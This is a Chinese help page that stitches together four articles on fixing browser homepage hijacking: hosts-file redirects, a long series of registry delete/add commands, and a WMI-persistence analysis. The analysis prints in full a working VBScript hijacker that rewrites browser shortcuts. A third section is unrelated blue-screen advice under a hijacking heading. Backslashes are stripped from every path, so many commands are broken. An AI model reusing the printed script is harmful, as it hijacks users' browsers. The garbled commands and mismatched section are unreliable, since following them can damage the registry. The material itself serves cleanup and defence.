61阅读

浏览器主页被劫持-浏览器主页被劫持怎么办? 修改hosts彻底解决浏览器主页劫持问题

发布时间:2018-03-12 所属栏目:网络安全

一 : 浏览器主页被劫持怎么办? 修改hosts彻底解决浏览器主页劫持问题

电脑浏览器主页总是被劫持,比如2345导航、360导航、hao123导航、毒霸导航等等,我们可以通过改hosts解决浏览器主页劫持的问题,下面我们就来看看详细的教程。

打开资源管理器定位到C:WindowsSystem32driversetc用记事本打开hosts这个文件。

13.82.28.61 2345.com

13.82.28.61 duba.com

13.82.28.61 hao.360.cn

13.82.28.61 hao123.com

13.82.28.61 baidu.com

格式:IP地址 空格 域名

这样在我们首页被劫持到这几个网站的时候,会自动访问13.82.28.61也就是微软msn导航

当然如果你习惯使用百度的话,只要把13.82.28.61换成123.125.114.144就可以了。

以上就是通过修改hosts彻底解决浏览器被劫持的问题,请继续关注61阅读。

感谢61阅读网友 Jack一Chen 的原创投稿

相关推荐:

opera欧朋浏览器怎么自定义主页?

千影浏览器怎么修改默认的主页界面?

360浏览器怎么设置新标签页作为主页?

二 : 手动处理IE被劫持的详细方法 IE浏览器被劫持的手动处理方法

本文旨在解决头痛的IE劫持问题。关于IE劫持,产生的原因很多,简单的可能就是注册表被改,复杂的就是有病毒、木马感染或者有驱动保护,但不管如何,最终还是要进行相关注册表复位。本文所提到的所有操作,有一个前提,那就是先要清除病毒,在这个前提下,我们可以按照本文所示的相关操作来处理。
一、注册表定位
开始-运行


cmd /c reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionAppletsRegedit" /v "LastKey" /d "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace" /f & start regedit.exe


二、WINXP系统标准显示
{1f4de370-d627-11d1-ba4f-00a0c91eedba}
{450D8FBA-AD25-11D0-98A8-0800361B1103}
{645FF040-5081-101B-9F08-00AA002F954E}
{e17d4fc0-5564-11d1-83f2-00a0c90dc849}
三、IE修复处理
开始-运行


cmd /k reg delete HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace /f
cmd /k reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{1f4de370-d627-11d1-ba4f-00a0c91eedba} /ve /t REG_SZ /d "Computer Search Results Folder" /f
cmd /k reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{450D8FBA-AD25-11D0-98A8-0800361B1103} /ve /t REG_SZ /f
cmd /k reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{450D8FBA-AD25-11D0-98A8-0800361B1103} /v "Removal Messagee" /t REG_SZ /d "@mydocs.dll,-900" /f
cmd /k reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{645FF040-5081-101B-9F08-00AA002F954E} /ve /t REG_SZ /d "Recycle Bin" /f
cmd /k reg add HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{e17d4fc0-5564-11d1-83f2-00a0c90dc849} /ve /t REG_SZ /d "Search Results Folder" /f


注意:在第二步,若产生多余的CLSID={XXXXXXXX-XXXX-XXXX-XXXX- XXXXXXXXXXXXX},则执行cmd /k reg delete HKEY_CLASSES_ROOTCLSID{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXXX} /f
四、假如是由网上邻居或者我的文档或者回收站 变化而来的IE图标,则可以先执行下属命令
我的文档:


cmd /k reg delete HKEY_CLASSES_ROOTCLSID{450D8FBA-AD25-11D0-98A8-0800361B1103} /f


我的电脑:


cmd /k reg delete HKEY_CLASSES_ROOTCLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D} /f


网上邻居:


cmd /k reg delete HKEY_CLASSES_ROOTCLSID{208D2C60-3AEA-1069-A2D7-08002B30309D} /f


回收站:


cmd /k reg delete HKEY_CLASSES_ROOTCLSID{645FF040-5081-101B-9F08-00AA002F954E} /f


完成上述操作后,然后把附件中的文件双击后导入到注册表。
五、桌面上标准的Internet Explorer图标右键条目若有问题,则可以如下操作
A)假如IE是6.0的,则依次在开始-运行中执行下面命令
第一条:CMD /K REG ADD HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D} /ve /t reg_sz /f
第二条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D} /v InfoTip /t reg_expand_sz /d "@shdoclc.dll,-881" /f
第三条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D} /v LocalizedString /t reg_expand_sz /d "@shdoclc.dll,-880" /f
第四条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}DefaultIcon /ve /t REG_SZ /d "shdoclc.dll,-190" /f
第五条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shell /ve /t reg_sz /f
第六条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePage /ve /t reg_sz /d "打开主页(&H)" /f
第七条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand /ve /t reg_expand_sz /d "C:Program FilesInternet Exploreriexplore.exe" /f
第八条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}ShellFolder /ve /t reg_sz /f
第九条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}ShellFolder /v Attributes /t reg_dword /d 36 /f
B)假如IE是7.0或者8.0,则依次执行下属命令
第一条:CMD /K REG ADD HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D} /ve /t reg_sz /f
第二条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}DefaultIcon /ve /t reg_sz /d "C:WINDOWSsystem32ieframe.dll,-190" /f
第三条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}InProcServer32 /ve /t reg_sz /d "C:WINDOWSsystem32ieframe.dll" /f
第四条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}InProcServer32 /v ThreadingModel /t reg_sz /d "Apartment" /f
第五条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellNoAddOns /ve /t reg_sz /d "Start Without Add-ons" /f
第六条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellNoAddOns /v LegacyDisable /t reg_sz /f
第七条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellNoAddOnsCommand /ve /t reg_sz /d ""C:Program FilesInternet Exploreriexplore.exe" -extoff" /f
第八条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePage /ve /t reg_sz /d "Open &Home Page" /f
第九条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePage /v LegacyDisable /t reg_sz /f
第十条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePage /v MUIVerb /t reg_sz /d "@shdoclc.dll,-10241" /f
第十一条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}shellOpenHomePageCommand /ve /t reg_sz /d ""C:Program FilesInternet Exploreriexplore.exe"" /f
第十二条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}Shellex /ve /t reg_sz /f
第十三条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}ShellexContextMenuHandlers /ve /t reg_sz /f
第十四条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}ShellexContextMenuHandlersieframe /ve /t reg_sz /d "{871C5380-42A0-1069-A2EA-08002B30309D}" /f
第十五条:cmd /k reg add HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}ShellexMayChangeDefaultMenu /ve /t reg_sz /f
六、桌面没有Internet Explorer图标
依次执行下属命令:
第一条命令


cmd /k reg delete "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoInternetIcon /f


第二条命令


cmd /k reg delete "HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoInternetIcon /f


第三条命令


cmd /k reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerHideDesktopIconsNewStartPanel" /v {871C5380-42A0-1069-A2EA-08002B30309D} /d 00000000 /t REG_DWORD /f


第四条命令


cmd /k reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerHideDesktopIconsClassicStartMenu" /v {871C5380-42A0-1069-A2EA-08002B30309D} /d 00000000 /t REG_DWORD /f


第五条命令


cmd /k reg add "HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerCLSID{871C5380-42A0-1069-A2EA-08002B30309D}ShellFolder" /v Attributes /d 00000000 /t REG_DWORD /f


第六条命令


cmd /k reg add "HKEY_CLASSES_ROOTCLSID{871C5380-42A0-1069-A2EA-08002B30309D}ShellFolder" /v Attributes /d 36 /t REG_DWORD /f


重新加载explorer.exe


cmd /c taskkill /f /im explorer.exe & start explorer


七、在执行上述操作后,桌面上的IE图标标识变成其他的标识(功能已经正常)则执行下属命令
第一条:cmd /k reg delete HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerExplorer Bars /f
第二条:cmd /k reg delete HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerCLSID{871C5380-42A0-1069-A2EA-08002B30309D}DefaultIcon /f
八、桌面显示(如我的文档、回收站或者网上邻居等)的问题
在执行上述操作后,且在桌面空白处右键-桌面-自定义桌面 正确选择我的文档、我的电脑、网上邻居后,仍无法显示上述图标,则可以执行下属命令:


cmd /k reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{1f4de370-d627-11d1-ba4f-00a0c91eedba} /ve /t reg_sz /d "Computer Search Results Folder" /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{450D8FBA-AD25-11D0-98A8-0800361B1103} /ve /t reg_sz /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{450D8FBA-AD25-11D0-98A8-0800361B1103} /v "Removal Message" /t reg_sz /d "@mydocs.dll,-900" /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{645FF040-5081-101B-9F08-00AA002F954E} /ve /t reg_sz /d "Recycle Bin" /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{e17d4fc0-5564-11d1-83f2-00a0c90dc849} /ve /t reg_sz /d "Search Results Folder" /f
cmd /k reg delete HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{1f4de370-d627-11d1-ba4f-00a0c91eedba} /ve /t reg_sz /d "Computer Search Results Folder" /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{450D8FBA-AD25-11D0-98A8-0800361B1103} /ve /t reg_sz /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{450D8FBA-AD25-11D0-98A8-0800361B1103} /v "Removal Message" /t reg_sz /d "@mydocs.dll,-900" /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{645FF040-5081-101B-9F08-00AA002F954E} /ve /t reg_sz /d "Recycle Bin" /f
cmd /k reg add HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerDesktopNameSpace{e17d4fc0-5564-11d1-83f2-00a0c90dc849} /ve /t reg_sz /d "Search Results Folder" /f


执行上述命令时要注意:
对于reg delete命令,执行后返回为:系统找不到指定的注册表项或值,则算过,可执行后面的命令;若返回提示:操作失败则说明该注册表项做了权限,可以进入注册表后修改权限,然后再执行该条命令。对于reg add 返回为操作失败的话,则可以打开注册表,修改该注册表项的权限,然后再执行该条命令
作者 彼岸花花

三 : 浏览器主页被劫持怎么办?浏览器默认主页被劫持解决方法

win8.1系统发生蓝屏问题已经属于常见问题之一,之前小编也介绍很多关于解决蓝屏的方法,一般都会根据提示的代码找回故障原因。这不有位Win8.1系统发生多次蓝屏,重新启动系统也会发生蓝屏,蓝屏提示的错误代码为0x0000013a,怎么办?这有可能是硬件的问题,大家不必太担心,下面小编分享详细解决方法。

具体步骤:

1、右键单击桌面上的 计算机,选择属性,选择左侧的 高级系统设置;

2、 单击 启动与故障恢复 里的 设置,将 自动重新启动 前面的勾选去掉。并且在 系统失败的下拉菜单中,选择小内存转储,按确定;

3、当您再次遇到蓝屏问题后,请您记录下蓝屏信息中的错误代码,并且打开C:WINDOWSMinidump文件夹,收集其中几个较新的.dmp的文件。

从.dmp文件的信息中,我们可以找出出现故障的硬件设备是哪一个,然后在对这个硬件进行修复,就能解决Win8.1多次蓝屏错误代码0x0000013a的问题了。

四 : IE,火狐以及其他浏览器主页被劫持到www.2345.com/?kunown的解决办法[图文]

近日在网上相续看到有网友表示自己在下载使用了VeryCD下载链接查看器这款工具以后,再打开浏览器就被直接跳转到 www.2345.com/?kunown 这个导航页面了,而且打开多个浏览器:IE、Chrome、Firefox、Opera、Safari、Maxthon,均相同症状,检查浏览器首页设置——均正常!

最后发现,原来快速启动栏的IE浏览器快捷命令被其修改,修改后的类似如下图,于是认为就是普通的修改快捷方式,手工删除 2345 网址的部分,但半小时后再次被更改了。考虑到可能加载了启动项,在注册表、启动项、服务等中均未查找到相关信息,重启后IE快捷方式被重新篡改。尝试了事件查看器和任务计划,均未在里面查出任何信息。

IE快捷方式的命令被修改为http://www.2345.com/?kunown

之后又安装了超级兔子、360、exterminateit等工具进行检查,也未检出。

打开ProcessMonitor进行监视,发现每隔30分钟出现一个scrcons.exe进程自动启动并修改快速启动栏的命令,然后自动关闭(幸亏是30分钟一次,你要是24小时一次,那我就杯具了……),修改Win7下opera快速启动图标路径类似如下:

C:UsersiefansAppDataRoamingMicrosoftInternet ExplorerQuick LaunchUser PinnedTaskBarOpera12.01 1532.lnk

查找资料,发现这应该是一个通过WMI发起的定时自动运行脚本。要查看WMI事件,到以下地址下载WMITool并安装

http://www.microsoft.com/en-us/download/details.aspx?id=24045

安装后打开WMI event viewer,点击左上角register for events,弹出Connect to namespace框,填入“rootsubscription”(手工复制粘贴啊,默认出现的不是这个),确定,出现下图:

打开 WMI event viewer 填入 rootsubscription

点击左侧_EventFilter:Name="unown_filter",再至右侧右键点击ActiveScriptEventConsume r Name="unown",右键选择view instant properties,如下图:

选择view instant properties

查看ScriptText项可知,这是一段VBScript调用系统服务间隔30分钟执行一次,将所有浏览器调用加上“http://www.2345.com/?kunown”!抓住你了~!隐藏的够深,没常驻进程,没有文件(把自己存储在WMI数据库中)。

受到影响的浏览器有(各色浏览器,差不多齐了):

"IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"

具体代码如下:

On Error Resume Next:Const link = "http://www.2345.com/?kunown":browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe"):Set oDic = CreateObject("scripting.dictionary"):For Each browser In browsers:oDic.Add LCase(browser), browser:Next:Set fso = CreateObject("Scripting.Filesystemobject"):Set WshShell = CreateObject("Wscript.Shell"):strDesktop = "C:UsersGeminiDesktop":strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop"):QuickLaunch = "C:UsersGeminiAppDataRoamingMicrosoftInternet ExplorerQuick Launch":UserPinnedStartMenu = QuickLaunch & "User PinnedStartMenu":UserPinnedTaskBar = QuickLaunch & "User PinnedTaskBar":For Each file In fso.GetFolder(strDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:For Each file In fso.GetFolder(strAllUsersDesktop).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:If fso.FolderExists(QuickLaunch) Then:For Each file In fso.GetFolder(QuickLaunch).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedStartMenu) Then:For Each file In fso.GetFolder(UserPinnedStartMenu).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If:If fso.FolderExists(UserPinnedTaskBar) Then:For Each file In fso.GetFolder(UserPinnedTaskBar).Files:If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then:set oShellLink = WshShell.CreateShortcut(file.Path):path = oShellLink.TargetPath:name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path):If oDic.Exists(LCase(name)) Then:oShellLink.Arguments = link:If file.Attributes And 1 Then:file.Attributes = file.Attributes - 1:End If:oShellLink.Save:End If:End If:Next:End If

最后,清除方法:在WMI event viewer中将“_EventFilter:Name="unown_filter"”项目右键删除!

删不掉?

到WMITool安装路径(例如:C:Program Files (x86)WMI Tools)下,右键点击wbemeventviewer.exe,选择以管理员身份运行!删之!

还没完,还要手动将快速启动栏中,将各个浏览器快捷命令中的http://www.2345.com/?kunown去掉!

暂时就这么多了,还有没有其它影响的话,用用再看吧!

解决方法来自:Gemini

本文标题:浏览器主页被劫持-浏览器主页被劫持怎么办? 修改hosts彻底解决浏览器主页劫持问题
本文地址: http://www.61k.com/1117677.html

61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1